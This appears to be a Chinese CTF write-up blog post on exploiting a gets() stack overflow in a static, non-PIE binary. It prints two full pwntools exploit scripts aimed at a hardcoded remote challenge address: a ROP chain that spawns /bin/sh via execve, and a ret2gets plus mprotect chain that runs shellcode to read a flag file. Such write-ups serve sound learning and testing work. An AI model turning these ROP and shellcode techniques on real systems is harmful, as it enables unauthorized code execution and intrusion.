
神奇的gets()

题目来自某群友给我发的一道题目,他跟我说:就一个栈溢出,你能 getshell 吗?我一开始有点懵,并没有什么思路,后来想了想:既然存在栈溢出,而且是静态编译——libc 的代码被整个链进了二进制里,gadget 足够多,也不需要先泄露地址——那是不是可以直接构建 ROP 链 getshell?借助 ROPgadget / ropper 这类工具,构建链子很简单。

题目内容

给了一个栈溢出,保护情况见下面的 checksec 截图。从后面的利用方式也能推断出来:应该开了 NX(所以官方 WP 要先 mprotect 再跳进 shellcode)、没有 PIE(gadget 地址固定在 0x40xxxx / 0x4bxxxx)、也没有 canary(直接覆盖返回地址就能打):

https://blog.restro.cn/wp-content/uploads/2021/08/image-18.png
https://blog.restro.cn/wp-content/uploads/2021/08/image-19.png

题目代码很简单,就这么一点点,也没有后门函数。

所以想到了借助ROP链子来打

EXP

#!/usr/bin/env python2
# execve generated by ROPgadget
from pwn import *
from LibcSearcher import *
from struct import pack

# Remote target; swap the commented-out process() line back in to debug a local copy.
#io = process('./a.out')
TARGET = ('34.136.150.230', '49156')
io = remote(*TARGET)

# Hex-dump everything that crosses the tube -- useful while the chain is being debugged.
context.log_level = 'debug'

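# ROP chain, originally emitted by ROPgadget's --ropchain and hand-trimmed.
# Addresses are absolute: the binary is static and non-PIE, so no leak is needed.
# Effect: store "/bin//sh\0" in .data, then execve("/bin//sh", &NULL, &NULL).
# Built from a list so the 59 "add rax, 1" steps (rax = 59 = __NR_execve on
# x86-64) are not 59 copy-pasted lines; b'' keeps this valid on python2 and python3.
POP_RSI     = 0x40961e   # pop rsi ; ret
POP_RAX     = 0x443657   # pop rax ; ret
POP_RDI     = 0x4018a4   # pop rdi ; ret
POP_RDX     = 0x4017df   # pop rdx ; ret
MOV_RSI_RAX = 0x445625   # mov qword ptr [rsi], rax ; ret
XOR_RAX     = 0x43db10   # xor rax, rax ; ret
INC_RAX     = 0x468d30   # add rax, 1 ; ret
SYSCALL     = 0x4012be   # syscall
DATA        = 0x4b90e0   # writable .data qword that receives "/bin//sh"
DATA_NULL   = DATA + 8   # next qword, zeroed: string terminator and a NULL argv/envp
SYS_EXECVE  = 59         # x86-64 execve syscall number (0x3b)

chain = [
    POP_RSI, DATA,            # rsi = &data
    POP_RAX, b'/bin//sh',     # rax = "/bin//sh"
    MOV_RSI_RAX,              # data[0:8] = "/bin//sh"
    POP_RSI, DATA_NULL,       # rsi = &data[8]
    XOR_RAX,                  # rax = 0
    MOV_RSI_RAX,              # data[8:16] = 0  (terminates the string)
    POP_RDI, DATA,            # rdi = path
    POP_RSI, DATA_NULL,       # rsi = argv  -> points at a NULL qword
    POP_RDX, DATA_NULL,       # rdx = envp  -> same NULL qword
    XOR_RAX,                  # rax = 0
]
chain += [INC_RAX] * SYS_EXECVE   # rax = 59
chain += [SYSCALL]                # execve(rdi, rsi, rdx)

# Raw strings are emitted as-is, everything else is packed as a little-endian qword.
p = b''.join(g if isinstance(g, bytes) else pack('<Q', g) for g in chain)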


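# The target reads with gets(), which only returns on '\n' or EOF, so the payload has
# to be newline-terminated.  The original send() carried no newline: the target then
# sits in gets() until the first interactive line arrives, and that line is swallowed
# as the terminator instead of reaching the shell.  b'' keeps this valid on python3.
RET_OFFSET = 0x48   # 0x40-byte buffer + 8 bytes of saved rbp (matches the official WP)
io.sendline(b'a' * RET_OFFSET + p)

io.interactive()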

结果

本地成功 getshell,但是远程打不通。

https://blog.restro.cn/wp-content/uploads/2021/08/image-20-1024x504.png

远程看起来像是拿到了 shell,但发不了指令,应该是没有真正打通。回头看 EXP,有两处值得怀疑:一是 `io.send()` 发送的 payload 没有带换行,而 gets() 要读到换行才返回,所以交互时敲的第一行会被 gets() 当成结束符吃掉;二是 EXP 里的 gadget 地址(比如 pop rdi ; ret 在 0x4018a4)和下面官方 WP 针对 babystack.out 的地址(0x4018f4)对不上——如果本地用的是自己编译出来的 a.out,这条链在远程那个二进制上根本对不齐。

官方WP

官方的说法是远程可能做了过滤(所谓 waf,对 pwn 题来说更像是对 execve 这类系统调用的限制)。官方 WP 干脆不起 shell:用 ret2gets 把 shellcode 写进 bss,mprotect 改成可执行之后,直接 open/read/write 把 flag 读出来。

from pwn import *
#context.log_level='debug'
#context.log_level='debug'
context.arch = 'amd64'   # asm()/shellcraft below must emit x86-64 code
HOST, PORT = "34.136.150.230", 49156
#p=process("./babystack.out")
p = remote(HOST, PORT)
elf = ELF("./babystack.out")   # local copy of the target; not referenced further down

# Gadgets and symbols from babystack.out.  Absolute addresses work because the
# binary is static and non-PIE.  The gadget roles follow from how they are used
# below (each pops the next qword off the stack into the named register).
rdi      = 0x4018f4   # pop rdi ; ret
rsi      = 0x40970e   # pop rsi ; ret
rdx      = 0x40182f   # pop rdx ; ret
bss      = 0x4b9000   # page-aligned writable region (mprotect needs page alignment)
gets     = 0x40bd70   # gets() inside the static binary
main     = 0x40209c   # not used below; kept for a ret2main if the chain needs restarting
mprotect = 0x443af0   # mprotect() inside the static binary

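# Stage 1: ret2gets -- call gets(bss) so the NEXT line we send lands in .bss.
# Stage 2: mprotect(bss, RWX_LEN, PROT_RWX) makes that region executable
#          (presumably NX is on, hence the mprotect), then return into it.
# bss (0x4b9000) is page-aligned, which mprotect requires.
PROT_RWX = 7        # PROT_READ | PROT_WRITE | PROT_EXEC
RWX_LEN  = 0x3000   # three pages from bss; shellcode and its buffers must stay inside

payload  = b"A" * 0x40 + b"B" * 0x8          # 0x40-byte buffer + saved rbp, then the return address
payload += p64(rdi) + p64(bss) + p64(gets)   # gets(bss): stage-2 bytes arrive here
payload += p64(rdi) + p64(bss)               # arg0: addr
payload += p64(rsi) + p64(RWX_LEN)           # arg1: len
payload += p64(rdx) + p64(PROT_RWX)          # arg2: prot
payload += p64(mprotect)                     # mprotect(bss, 0x3000, 7)
payload += p64(bss)                          # ret into the shellcode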


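# Stage-2 shellcode: open("./flag.txt") ; read(fd, buf, 1000) ; write(1, buf, 1000).
# "rax" hands read() the fd that open() just returned.
# The shellcode itself runs from bss (0x4b9000), so the flag must NOT be read back to
# 0x4b9000: that overwrites the shellcode's own bytes while it executes and only works
# as long as the flag is shorter than the code already run.  0x4b9800 is in the same
# (already written, RWX) page and comfortably past the assembled code.
FLAG_BUF = 0x4b9800
shellcode  = shellcraft.open("./flag.txt", 0, 0)
shellcode += shellcraft.read("rax", FLAG_BUF, 1000)
shellcode += shellcraft.write(1, FLAG_BUF, 1000)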
# Two lines go down the wire: the ROP payload (consumed by the program's own gets())
# and then the raw shellcode (consumed by the gets(bss) we return into).  The short
# sleeps just let the remote settle between reads; recvuntil() on a known prompt would
# be more robust, but the prompt text is not shown here.  Since gets() stops at 0x0a,
# the assembled shellcode must not contain a newline byte -- worth checking if this
# ever stops working after a pwntools upgrade.
stage1 = payload
stage2 = asm(shellcode)
sleep(0.2)
p.sendline(stage1)
sleep(0.2)
p.sendline(stage2)
p.interactive()

2021-08-07